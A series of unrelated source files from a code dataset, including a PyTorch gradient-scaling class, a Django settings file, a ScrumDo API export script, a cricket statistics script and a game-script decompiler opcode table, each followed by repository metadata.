elif line.find("config_restart_interval") >= 0:
new_line = " config_restart_interval = '1000_00:00:01'\n"
elif line.find("config_stats_interval") >= 0:
new_line = " config_stats_interval = '1000_00:00:01'\n"
elif line.find("config_dt") >= 0:
new_line = " config_dt = '%s'\n"%(seconds_to_timestamp(world.dt_sec))
elif line.find("config_frames_per_outfile") >= 0:
new_line = " config_frames_per_outfile = 0\n"
elif line.find("config_write_output_on_startup") >= 0:
new_line = " config_write_output_on_startup = .true.\n"
elif world.time_stepper_change:
if line.find("config_time_integrator") >= 0:
new_line = " config_time_integrator = '%s'\n"%(time_stepper)
namelistfile.write(new_line)
namelistfile.close()
del lines
#}}}
#{{{ Setup streams file
tree = ET.parse(world.streams)
root = tree.getroot()
# Remove all streams (leave the immutable streams)
for stream in root.findall('stream'):
root.remove(stream)
# Create an output stream
output = ET.SubElement(root, 'stream')
output.set('name', 'output')
output.set('type', 'output')
output.set('filename_template', 'output.nc')
output.set('filename_interval', 'none')
output.set('output_interval', '01')
# Add tracers to output stream
member = ET.SubElement(output, 'var_array')
member.set('name', 'tracers')
# Add layerThickness to output stream
member = ET.SubElement(output, 'var')
member.set('name', 'layerThickness')
# Add normalVelocity to output stream
member = ET.SubElement(output, 'var')
member.set('name', 'normalVelocity')
tree.write(world.streams)
del tree
del root
del output
del member
#}}}
os.chdir(world.base_dir)
#}}}
|
[
"jacobsen.douglas@gmail.com"
] |
jacobsen.douglas@gmail.com
|
522cb82226b84c23e82b5bac48da2df2b3f8d690
|
d727adfa5c469625182e18448e297786988e953b
|
/examples/python/export_attachments_comments.py
|
180997d51f20f4d6a357ddfa28f457556b21c10c
|
[
"MIT"
] |
permissive
|
swaticode/ScrumDoAPIv3
|
17958f8f7350bc9e5e0b3f6d0eba46f794f06be3
|
042a21d259029123f1ca1ab27fcd9360281787af
|
refs/heads/master
| 2021-01-23T17:42:17.404561
| 2017-04-27T00:54:03
| 2017-04-27T00:54:03
| 102,773,266
| 0
| 0
| null | 2017-09-07T18:43:04
| 2017-09-07T18:43:03
| null |
UTF-8
|
Python
| false
| false
| 3,388
|
py
|
import slumber
from colorama import init, Fore, Back, Style
from time import sleep
import urllib2
import local_settings as settings
import json
import os
# We're using slumber (http://slumber.in/), a python library that makes RESTfull calls amazingly easy, to access the API
def main():
init()
base_url = "%s/api/v3/" % settings.scrumdo_host
api = slumber.API(base_url, auth=(settings.scrumdo_username, settings.scrumdo_password))
for project in api.organizations(settings.organization_slug).projects.get():
exportProject(project, api)
def exportProject(project, api):
print "Exporting project {slug}".format(slug=project['slug'])
ensure_dir('output/{slug}'.format(slug=project['slug']) )
filename = 'output/{slug}/project.json'.format(slug=project['slug'])
with open(filename, 'w') as output:
output.write( json.dumps(project, indent=2) )
epics = api.organizations(settings.organization_slug).projects.epics.get()
filename = 'output/{slug}/epics.json'.format(slug=project['slug'])
with open(filename, 'w') as output:
output.write(json.dumps(epics, indent=2))
for iteration in api.organizations(settings.organization_slug).projects(project['slug']).iterations.get():
exportIteration(project, iteration, api)
def exportIteration(project, iteration, api):
print " Exporting iteration {id}".format(id=iteration['id'])
ensure_dir('output/{slug}/{id}'.format(slug=project['slug'], id=iteration['id']) )
filename = 'output/{slug}/{id}/iteration.json'.format(slug=project['slug'], id=iteration['id'])
with open(filename, 'w') as output:
output.write( json.dumps(iteration, indent=2) )
for story in api.organizations(settings.organization_slug).projects(project['slug']).iterations(iteration['id']).stories.get():
exportStory(project, iteration, story, api)
def exportStory(project, iteration, story, api):
comments = api.comments.story(story['id']).get()
ensure_dir('output/{slug}/{id}/{number}'.format(slug=project['slug'], id=iteration['id'], number=story['number']))
filename = 'output/{slug}/{id}/{number}/card.json'.format(slug=project['slug'], id=iteration['id'], number=story['number'])
with open(filename, 'w') as output:
output.write( json.dumps(story, indent=2) )
if len(comments) > 0:
filename = 'output/{slug}/{id}/{number}/comments.json'.format(slug=project['slug'], id=iteration['id'], number=story['number'])
with open(filename, 'w') as output:
output.write( json.dumps(comments, indent=2) )
attachments = api.organizations(settings.organization_slug).projects(project['slug']).stories(story['id']).attachments.get()
for attachment in attachments:
df = urllib2.urlopen(attachment['url'])
filename = u"output/{slug}/{id}/{number}/{filename}".format(slug=project['slug'], id=iteration['id'], number=story['number'], filename=attachment['filename'])
output = open(filename,'wb')
output.write(df.read())
output.close()
print filename
def ensure_dir(f):
if not os.path.exists(f):
os.makedirs(f)
# Since we're iterating over your entire account in this example, there could be a lot of API calls.
# This function is a dumb way to make sure we don't go over the throttle limit.
def check_throttle(requests):
requests += 1
if requests >= 49:
sleep(5) # Add in a delay when we get close the our max # of requests per 5 seconds.
return 0
return requests
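# Intended usage inside the export loops (sketch): keep a running counter and
# reassign it after every API call, e.g. requests = check_throttle(requests).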
if __name__ == "__main__":
main()
|
[
"marc.hughes@gmail.com"
] |
marc.hughes@gmail.com
|
c41c591c5cd9229e940f202ae5d2a67c35aa77b3
|
ee0902f2b930eeb9ae626f4a325a62bcd505a108
|
/app/consoles.py
|
60e3074ccf9814bf8333913fc16a02b8fce2286c
|
[] |
no_license
|
EvanDorsky/wh2music
|
052f1e809cb96f8c154edc92763514a7c0390ed2
|
6df422a48dd03390383ab46c87c93229f082f4d4
|
refs/heads/master
| 2021-01-18T07:48:37.425963
| 2013-06-26T01:07:57
| 2013-06-26T01:07:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,118
|
py
|
#For shits and giggles, for those times I type console.log
from __future__ import print_function
import sys
import inspect
class Console(object):
def __init__(self, log=None):
__old_excepthook = sys.excepthook
self.__log__ = []
def console_excepthook(*args):
if log:
log.write(self.format(self.__log__))
__old_excepthook(*args)
sys.excepthook = console_excepthook
def log(self, *args):
filename = inspect.getframeinfo(inspect.stack()[1][0]).filename
line = inspect.stack()[1][2]
self.__log__.append((filename, line, args))
print(self.format_line(self.__log__[-1]))
return '' #So templates don't print it
def format(self, log):
string = ''
for line in log:
            string += self.format_line(line) + '\n'
return string
def format_line(self, logdata):
prefix = '%s (%d):' %(logdata[0],logdata[1])
        return prefix + ' ' + ' '.join(str(arg) for arg in logdata[2])
def __str__(self):
return '<Console object with %d logs>' %len(self.__log__)
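# Usage sketch (the logged values below are illustrative only):
#     console = Console()
#     console.log('request took', 42, 'ms')   # prints "<caller file> (<line>): request took 42 ms"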
|
[
"allevitan@gmail.com"
] |
allevitan@gmail.com
|
9ed54c4533ed3732ca4a892e7612914bbe44c2c4
|
d0f5fc44cd928fe575774403dcf05cb3a2f52dba
|
/src/appier/test/__init__.py
|
5b2204c86fab7233c0af77351c4f8902bb4466ce
|
[
"Apache-2.0"
] |
permissive
|
gcandal/appier
|
8f7a7088da56637e0ff079b395b1af863a77d4ca
|
00a8bd952fda2392184308e324bd97ba4bb18f3c
|
refs/heads/master
| 2021-07-16T02:28:25.894889
| 2019-06-17T18:10:58
| 2019-06-17T18:10:58
| 69,974,499
| 0
| 0
| null | 2016-10-04T14:42:32
| 2016-10-04T14:42:32
| null |
UTF-8
|
Python
| false
| false
| 1,213
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Hive Appier Framework
# Copyright (c) 2008-2016 Hive Solutions Lda.
#
# This file is part of Hive Appier Framework.
#
# Hive Appier Framework is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by the Apache
# Foundation, either version 2.0 of the License, or (at your option) any
# later version.
#
# Hive Appier Framework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License along with
# Hive Appier Framework. If not, see <http://www.apache.org/licenses/>.
__version__ = "1.0.0"
""" The version of the module """
__revision__ = "$LastChangedRevision$"
""" The revision number of the module """
__date__ = "$LastChangedDate$"
""" The last change date of the module """
__copyright__ = "Copyright (c) 2008-2016 Hive Solutions Lda."
""" The copyright for the module """
__license__ = "Apache License, Version 2.0"
""" The license for the module """
|
[
"joamag@gmail.com"
] |
joamag@gmail.com
|
5baf5f4ab1ce0f06bf39227bd60e30bfe38afa7f
|
bcbf1ea1c0c900e6d351bedcbf70025f7da1495f
|
/torch/cuda/amp/grad_scaler.py
|
dbb6371d633f10fefae1fe7541410cc06bd95aa8
|
[
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
taohe/pytorch
|
aeaca1ffd66b389535fd7b16eca61ab486c629a5
|
f5f1e5e7f66502a6a3f53f22f5034fdef8f040e9
|
refs/heads/master
| 2021-02-05T14:50:52.607646
| 2020-02-28T07:43:39
| 2020-02-28T07:48:09
| 243,793,286
| 0
| 0
|
NOASSERTION
| 2020-02-28T15:26:36
| 2020-02-28T15:26:36
| null |
UTF-8
|
Python
| false
| false
| 20,996
|
py
|
import torch
from collections import defaultdict
from torch._six import container_abcs
class _MultiDeviceReplicator(object):
"""
Lazily serves copies of a tensor to requested devices. Copies are cached per-device.
"""
def __init__(self, master_tensor):
assert master_tensor.is_cuda
self.master = master_tensor
self._per_device_tensors = {}
def get(self, device):
retval = self._per_device_tensors.get(device, None)
if retval is None:
retval = self.master.to(device=device, non_blocking=True, copy=True)
self._per_device_tensors[device] = retval
return retval
class GradScaler(object):
"""
An instance ``scaler`` of :class:`GradScaler` helps perform the steps of gradient scaling
conveniently.
* ``scaler.scale(loss)`` multiplies a given loss by ``scaler``'s current scale factor.
* ``scaler.step(optimizer)`` safely unscales gradients and calls ``optimizer.step()``.
* ``scaler.update()`` updates ``scaler``'s scale factor.
Typical use::
# Creates a GradScaler once at the beginning of training.
scaler = GradScaler()
for epoch in epochs:
for input, target in data:
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
# Scales the loss, and calls backward() on the scaled loss to create scaled gradients.
scaler.scale(loss).backward()
# scaler.step() first unscales the gradients of the optimizer's assigned params.
# If these gradients do not contain infs or NaNs, optimizer.step() is then called,
# otherwise, optimizer.step() is skipped.
scaler.step(optimizer)
# Updates the scale for next iteration.
scaler.update()
See the :ref:`Gradient Scaling Examples<gradient-scaling-examples>` for usage in more complex cases like
gradient clipping, gradient penalty, and multiple losses/optimizers.
``scaler`` dynamically estimates the scale factor each iteration. To minimize gradient underflow,
a large scale factor should be used. However, ``torch.float16`` values can "overflow" (become inf or NaN) if
the scale factor is too large. Therefore, the optimal scale factor is the largest factor that can be used
without incurring inf or NaN gradient values.
``scaler`` approximates the optimal scale factor over time by checking the gradients for infs and NaNs during every
``scaler.step(optimizer)`` (or optional separate ``scaler.unscale_(optimizer)``, see :meth:`unscale_`).
* If infs/NaNs are found, ``scaler.step(optimizer)`` skips the underlying ``optimizer.step()`` (so the params
themselves remain uncorrupted) and ``update()`` multiplies the scale by ``backoff_factor``.
* If no infs/NaNs are found, ``scaler.step(optimizer)`` runs the underlying ``optimizer.step()`` as usual.
If ``growth_interval`` unskipped iterations occur consecutively, ``update()`` multiplies the scale by
``growth_factor``.
The scale factor often causes infs/NaNs to appear in gradients for the first few iterations as its
value calibrates. ``scaler.step`` will skip the underlying ``optimizer.step()`` for these
iterations. After that, step skipping should occur rarely (once every few hundred or thousand iterations).
Arguments:
init_scale (float, optional, default=2.**16): Initial scale factor.
growth_factor (float, optional, default=2.0): Factor by which the scale is multiplied during
:meth:`update` if no inf/NaN gradients occur for ``growth_factor`` consecutive iterations.
backoff_factor (float, optional, default=0.5): Factor by which the scale is multiplied during
:meth:`update` if inf/NaN gradients occur in an iteration.
growth_interval (int, optional, default=2000): Number of consecutive iterations without inf/NaN gradients
that must occur for the scale to be multiplied by ``growth_factor``.
enabled (bool, optional, default=True): If ``False``, disables gradient scaling. :meth:`step` simply
invokes the underlying ``optimizer.step()``, and other methods become no-ops.
"""
# Python 2 doesn't support enums.
READY = 0
UNSCALED = 1
STEPPED = 2
def __init__(self,
init_scale=2.**16,
growth_factor=2.0,
backoff_factor=0.5,
growth_interval=2000,
enabled=True):
self._enabled = enabled
if enabled:
assert growth_factor > 1.0, "The growth factor must be > 1.0."
assert backoff_factor < 1.0, "The backoff factor must be < 1.0."
self._init_scale = init_scale
# self._scale will be lazily initialized during the first call to scale()
self._scale = None
self._growth_factor = growth_factor
self._backoff_factor = backoff_factor
self._growth_interval = growth_interval
self._init_growth_tracker = 0
# self._growth_tracker will be lazily initialized during the first call to scale()
self._growth_tracker = None
READY = self.READY
self._per_optimizer_states = defaultdict(lambda: {"stage": READY, "found_inf_per_device": {}})
def _check_scale_growth_tracker(self, funcname):
fix = "This may indicate your script did not use scaler.scale(loss or outputs) earlier in the iteration."
assert self._scale is not None, "Attempted {} but _scale is None. ".format(funcname) + fix
assert self._growth_tracker is not None, "Attempted {} but _growth_tracker is None. ".format(funcname) + fix
def _lazy_init_scale_growth_tracker(self, dev):
assert self._growth_tracker is None, "_growth_tracker initialized before _scale"
self._scale = torch.full((1,), self._init_scale, dtype=torch.float32, device=dev)
self._growth_tracker = torch.full((1,), self._init_growth_tracker, dtype=torch.int32, device=dev)
def scale(self, outputs):
"""
Multiplies ('scales') a tensor or list of tensors by the scale factor.
Arguments:
outputs (Tensor or iterable of Tensors): Outputs to scale.
Returns:
Scaled outputs. If this instance of :class:`GradScaler` is not enabled, outputs are returned unmodified.
"""
if not self._enabled:
return outputs
# Short-circuit for the common case.
if isinstance(outputs, torch.Tensor):
assert outputs.is_cuda
if self._scale is None:
self._lazy_init_scale_growth_tracker(outputs.device)
return outputs * self._scale.to(device=outputs.device, non_blocking=True)
# Invoke the more complex machinery only if we're treating multiple outputs.
stash = [None] # trick to hold a reference that can be overwritten at any level of the recursion below.
def apply_scale(val):
if isinstance(val, torch.Tensor):
assert val.is_cuda
if self._scale is None:
self._lazy_init_scale_growth_tracker(val.device)
if stash[0] is None:
stash[0] = _MultiDeviceReplicator(self._scale)
return val * stash[0].get(val.device)
elif isinstance(val, container_abcs.Iterable):
return type(val)(apply_scale(v) for v in val)
else:
raise ValueError("outputs must be a Tensor or an iterable of Tensors")
return apply_scale(outputs)
def _unscale_grads_(self, optimizer, inv_scale, found_inf, allow_fp16):
per_device_inv_scale = _MultiDeviceReplicator(inv_scale)
per_device_found_inf = _MultiDeviceReplicator(found_inf)
for group in optimizer.param_groups:
for param in group["params"]:
if param.grad is not None:
if (not allow_fp16) and param.grad.dtype == torch.float16:
raise ValueError("Attempting to unscale FP16 gradients.")
else:
torch._amp_non_finite_check_and_unscale_(param.grad,
per_device_found_inf.get(param.grad.device),
per_device_inv_scale.get(param.grad.device))
return per_device_found_inf._per_device_tensors
def unscale_(self, optimizer):
"""
Divides ("unscales") the optimizer's gradient tensors by the scale factor.
:meth:`unscale_` is optional, serving cases where you need to
:ref:`modify or inspect gradients<working-with-unscaled-gradients>`
between the backward pass(es) and :meth:`step`.
If :meth:`unscale_` is not called explicitly, gradients will be unscaled automatically during :meth:`step`.
Simple example, using :meth:`unscale_` to enable clipping of unscaled gradients::
...
scaler.scale(loss).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
scaler.step(optimizer)
scaler.update()
Arguments:
optimizer (torch.optim.Optimizer): Optimizer that owns the gradients to be unscaled.
.. note::
:meth:`unscale_` does not incur a CPU-GPU sync.
.. warning::
:meth:`unscale_` should only be called once per optimizer per :meth:`step` call,
and only after all gradients for that optimizer's assigned parameters have been accumulated.
Calling :meth:`unscale_` twice for a given optimizer between each :meth:`step` triggers a RuntimeError.
"""
if not self._enabled:
return
self._check_scale_growth_tracker("unscale_")
optimizer_state = self._per_optimizer_states[id(optimizer)]
if optimizer_state["stage"] == self.UNSCALED:
raise RuntimeError("unscale_() has already been called on this optimizer since the last update().")
elif optimizer_state["stage"] == self.STEPPED:
raise RuntimeError("unscale_() is being called after step().")
# FP32 division can be imprecise for certain compile options, so we carry out the reciprocal in FP64.
inv_scale = self._scale.double().reciprocal().float()
found_inf = torch.full((1,), 0.0, dtype=torch.float32, device=self._scale.device)
optimizer_state["found_inf_per_device"] = self._unscale_grads_(optimizer, inv_scale, found_inf, False)
optimizer_state["stage"] = self.UNSCALED
def step(self, optimizer, *args, **kwargs):
"""
:meth:`step` carries out the following two operations:
1. Internally invokes ``unscale_(optimizer)`` (unless :meth:`unscale_` was explicitly called for ``optimizer``
earlier in the iteration). As part of the :meth:`unscale_`, gradients are checked for infs/NaNs.
2. If no inf/NaN gradients are found, invokes ``optimizer.step()`` using the unscaled
gradients. Otherwise, ``optimizer.step()`` is skipped to avoid corrupting the params.
``*args`` and ``**kwargs`` are forwarded to ``optimizer.step()``.
Arguments:
optimizer (torch.optim.Optimizer): Optimizer that applies the gradients.
args: Any arguments.
kwargs: Any keyword arguments.
Returns:
The return value of ``optimizer.step(*args, **kwargs)``.
.. warning::
Closure use is not currently supported.
"""
if (not self._enabled):
return optimizer.step(*args, **kwargs)
if "closure" in kwargs:
raise RuntimeError("Closure use is not currently supported if GradScaler is enabled.")
self._check_scale_growth_tracker("step")
optimizer_state = self._per_optimizer_states[id(optimizer)]
if optimizer_state["stage"] == self.STEPPED:
raise RuntimeError("step() has already been called since the last update().")
retval = None
if (hasattr(optimizer, "_step_supports_amp_scaling") and optimizer._step_supports_amp_scaling):
# This optimizer has customized scale-handling logic, so we can call optimizer.step() directly.
# The contract with custom optimizers is that their step() should accept an additional,
# optional grad_scaler kwarg. We append self to the kwargs so the custom optimizer has full information:
# it can query its own state, invoke unscale_ on itself, etc
retval = optimizer.step(*args, **dict(kwargs, grad_scaler=self))
optimizer_state["stage"] == self.STEPPED
return retval
if optimizer_state["stage"] == self.READY:
self.unscale_(optimizer)
assert len(optimizer_state["found_inf_per_device"]) > 0, "No inf checks were recorded for this optimizer."
if not sum(v.item() for v in optimizer_state["found_inf_per_device"].values()):
retval = optimizer.step(*args, **kwargs)
optimizer_state["stage"] == self.STEPPED
return retval
def update(self, new_scale=None):
"""
Updates the scale factor.
If any optimizer steps were skipped the scale is multiplied by ``backoff_factor``
to reduce it. If ``growth_interval`` unskipped iterations occurred consecutively,
the scale is multiplied by ``growth_factor`` to increase it.
Passing ``new_scale`` sets the scale directly.
Arguments:
new_scale (float or :class:`torch.cuda.FloatTensor`, optional, default=None): New scale factor.
.. warning::
:meth:`update` should only be called at the end of the iteration, after ``scaler.step(optimizer)`` has
been invoked for all optimizers used this iteration.
"""
if not self._enabled:
return
self._check_scale_growth_tracker("update")
if new_scale is not None:
# Accept a new user-defined scale.
if isinstance(new_scale, float):
self._scale = torch.full((1,), new_scale, dtype=torch.float32, device=self._scale.device)
else:
reason = "new_scale should be a float or a 1-element torch.cuda.FloatTensor with requires_grad=False."
assert isinstance(new_scale, torch.cuda.FloatTensor), reason
assert new_scale.numel() == 1, reason
assert new_scale.requires_grad is False, reason
self._scale = new_scale
else:
# Consume shared inf/nan data collected from optimizers to update the scale.
# If all found_inf tensors are on the same device as self._scale, this operation is asynchronous.
found_infs = [found_inf.to(device=self._scale.device, non_blocking=True)
for state in self._per_optimizer_states.values()
for found_inf in state["found_inf_per_device"].values()]
assert len(found_infs) > 0, "No inf checks were recorded prior to update."
found_inf_combined = found_infs[0]
if len(found_infs) > 1:
for i in range(1, len(found_infs)):
found_inf_combined += found_infs[i]
self._scale = torch._amp_update_scale(self._growth_tracker,
self._scale,
found_inf_combined,
self._growth_factor,
self._backoff_factor,
self._growth_interval)
# To prepare for next iteration, clear the data collected from optimizers this iteration.
self._per_optimizer_states = defaultdict(lambda: {"stage": self.READY, "found_inf_per_device": {}})
def _get_scale_async(self):
return self._scale
def get_scale(self):
"""
Returns:
A Python float containing the current scale, or 1.0 if scaling is disabled.
.. warning::
:meth:`get_scale` incurs a CPU-GPU sync.
"""
if self._enabled:
return self._init_scale if self._scale is None else self._get_scale_async().item()
else:
return 1.0
def get_growth_factor(self):
r"""
Returns:
A Python float containing the scale growth factor.
"""
return self._growth_factor
def set_growth_factor(self, new_factor):
r"""
Arguments:
            new_factor (float): Value to use as the new scale growth factor.
"""
self._growth_factor = new_factor
def get_backoff_factor(self):
r"""
Returns:
A Python float containing the scale backoff factor.
"""
return self._backoff_factor
def set_backoff_factor(self, new_factor):
r"""
Arguments:
            new_factor (float): Value to use as the new scale backoff factor.
"""
self._backoff_factor = new_factor
def get_growth_interval(self):
r"""
Returns:
A Python int containing the growth interval.
"""
return self._growth_interval
def set_growth_interval(self, new_interval):
r"""
Arguments:
new_interval (int): Value to use as the new growth interval.
"""
self._growth_interval = new_interval
def _get_growth_tracker(self):
if self._enabled:
return self._init_growth_tracker if self._growth_tracker is None else self._growth_tracker.item()
else:
return 0
def is_enabled(self):
r"""
Returns:
A bool indicating whether this instance is enabled.
"""
return self._enabled
def state_dict(self):
r"""
Returns the state of the scaler as a :class:`dict`. It contains five entries:
* ``"scale"`` - a Python float containing the current scale
* ``"growth_factor"`` - a Python float containing the current growth factor
* ``"backoff_factor"`` - a Python float containing the current backoff factor
* ``"growth_interval"`` - a Python int containing the current growth interval
* ``"_growth_tracker"`` - a Python int containing the number of recent consecutive unskipped steps.
If this instance is not enabled, returns an empty dict.
.. note::
If you wish to checkpoint the scaler's state after a particular iteration, :meth:`state_dict`
should be called after :meth:`update`.
"""
return {"scale": self.get_scale(),
"growth_factor": self._growth_factor,
"backoff_factor": self._backoff_factor,
"growth_interval": self._growth_interval,
"_growth_tracker": self._get_growth_tracker()} if self._enabled else {}
def load_state_dict(self, state_dict):
r"""
Loads the scaler state. If this instance is disabled, :meth:`load_state_dict` is a no-op.
Arguments:
state_dict(dict): scaler state. Should be an object returned from a call to :meth:`state_dict`.
"""
if not self._enabled:
return
if len(state_dict) == 0:
raise RuntimeError("The source state dict is empty, possibly because it was saved "
"from a disabled instance of GradScaler.")
self._init_scale = state_dict["scale"]
if self._scale is not None:
self._scale.fill_(state_dict["scale"])
self._growth_factor = state_dict["growth_factor"]
self._backoff_factor = state_dict["backoff_factor"]
self._growth_interval = state_dict["growth_interval"]
self._init_growth_tracker = state_dict["_growth_tracker"]
if self._growth_tracker is not None:
self._growth_tracker.fill_(state_dict["_growth_tracker"])
def _check_inf_per_device(self, optimizer):
self._check_scale_growth_tracker("_check_inf_per_device")
dummy_inv_scale = torch.full((1,), 1.0, dtype=torch.float32, device=self._scale.device)
found_inf = torch.full((1,), 0.0, dtype=torch.float32, device=self._scale.device)
self._per_optimizer_states[id(optimizer)]["found_inf_per_device"] = \
self._unscale_grads_(optimizer, dummy_inv_scale, found_inf, True)
return self._per_optimizer_states[id(optimizer)]["found_inf_per_device"]
def _found_inf_per_device(self, optimizer):
return self._per_optimizer_states[id(optimizer)]["found_inf_per_device"]
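def _example_amp_training_loop(model, optimizer, data_loader, loss_fn, device="cuda"):
    # Minimal usage sketch, not part of the original module: it shows the scale()/step()/
    # update() contract documented above. model, optimizer, data_loader and loss_fn are
    # placeholders supplied by the caller; torch.cuda.amp.autocast is assumed to be
    # available in this build.
    scaler = GradScaler()
    for inputs, targets in data_loader:
        optimizer.zero_grad()
        with torch.cuda.amp.autocast():
            loss = loss_fn(model(inputs.to(device)), targets.to(device))
        scaler.scale(loss).backward()   # scale the loss so small fp16 gradients survive
        scaler.step(optimizer)          # unscales and steps, or skips if infs/NaNs were found
        scaler.update()                 # grows or backs off the scale for the next iteration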
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
27d895e9926997b17101009aa6aad3e92ea748bb
|
b25e06d09ac3bcd31f6589c06d72790a96e447d1
|
/IPL/Mixed records and analysis/most_matches.py
|
0be12f7bd21eea213a46e79d4e75675bd029c1f7
|
[] |
no_license
|
forceyash/PythonProjects
|
01aaa16d246bea183028952085ad56b7e19f4b58
|
387b195a61e4cdaa1da96ab38a65bf0b326f11d8
|
refs/heads/master
| 2020-03-24T19:04:01.269194
| 2019-02-28T17:50:52
| 2019-02-28T17:50:52
| 142,907,972
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 992
|
py
|
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
deliveries = pd.read_csv("C:\\Users\\yash.a.mishra\\AppData\\Local\\Programs\\Python\\Python37\\Machine Learning\\Pandas\\ipl\\deliveries.csv")
#mapper = deliveries.groupby(['match_id', 'inning']).batsman.apply(lambda x: dict(zip(x[~x.duplicated()], np.arange(1, len(x[~x.duplicated()])+1)))).reset_index(name = 'batting_position').rename(columns = {'level_2':'batsman'})
players = pd.DataFrame(columns=("match_id", "player"))
i=0
def func1(x):
batters = x.batsman.unique()
bowlers = x.bowler.unique()
fielder = x.fielder.unique()
All = np.concatenate((batters, bowlers, fielder))
All = pd.Series(np.array(All).tolist()).drop_duplicates()
return pd.DataFrame(data = {"players": All})
mapper = deliveries.groupby('match_id')["batsman", "bowler", "fielder"].apply(lambda x: func1(x)).reset_index().drop("level_1", axis = 1).dropna()
print(mapper.groupby('players').match_id.count().nlargest(30))
|
[
"forceyash@yahoo.com"
] |
forceyash@yahoo.com
|
3798c5835b31c5b38035c561ed16c4a8bb5e76ca
|
49cfa38094989a4762bd1a875af0c1c38f893220
|
/project/settings.py
|
22ee98e17346257203e29e5b56e5c064c1263575
|
[
"MIT"
] |
permissive
|
Rajesh25B/SuperSpace
|
8879e5315792e20bc4790c44dacbbf813a65f5e6
|
86eeb9bd499e21c92a29a44e31985333bd85cd28
|
refs/heads/main
| 2023-03-21T06:38:53.433466
| 2021-03-21T20:21:46
| 2021-03-21T20:21:46
| 349,925,742
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,306
|
py
|
"""
Django settings for project project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'fqw=+q3m$s4k2^i0@u394a48h#@0ouq@ai(c+gf5iurf@oq0f^'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'bootstrap4',
# local
'accounts',
'posts',
'groups'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = BASE_DIR / 'staticfiles'
STATICFILES_DIRS = [
BASE_DIR / 'static',
]
LOGIN_REDIRECT_URL = 'test'
LOGOUT_REDIRECT_URL = 'thanks'
|
[
"basvoju.rajesh@gmail.com"
] |
basvoju.rajesh@gmail.com
|
f2bc31a5e78ba6421224eb8bd9681f9117f2613e
|
25884fc96cabc943f3f4a4525f21d89b260ad279
|
/Source/Falcom/EDAO/Decompiler/Instruction/ScenaOpTableEDAO.py
|
e2b41dad36eb912282f2ebc1ab104ac6169c885b
|
[] |
no_license
|
poragn/Arianrhod
|
67399e7e0678b0988aa3f9b12ccc318c877b3178
|
2f1a7ac4daba1c6f1cf7a29db4b7cddac288d00e
|
refs/heads/master
| 2021-01-20T22:54:54.321842
| 2015-09-20T07:25:45
| 2015-09-20T07:25:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59,541
|
py
|
from Assembler.InstructionTable import *
from Base.EDAOBase import *
from GameData.ItemNameMap import *
def GetOpCode(fs):
return fs.byte()
def WriteOpCode(fs, op):
return fs.wbyte(op)
edao_op_table = InstructionTable(GetOpCode, WriteOpCode, DefaultGetLabelName, CODE_PAGE)
InstructionNames = {}
InstructionNames[0x00] = 'ExitThread'
InstructionNames[0x01] = 'Return'
InstructionNames[0x02] = 'Jc'
InstructionNames[0x03] = 'Jump'
InstructionNames[0x04] = 'Switch'
InstructionNames[0x05] = 'Call'
InstructionNames[0x06] = 'NewScene'
InstructionNames[0x07] = 'IdleLoop'
InstructionNames[0x08] = 'Sleep'
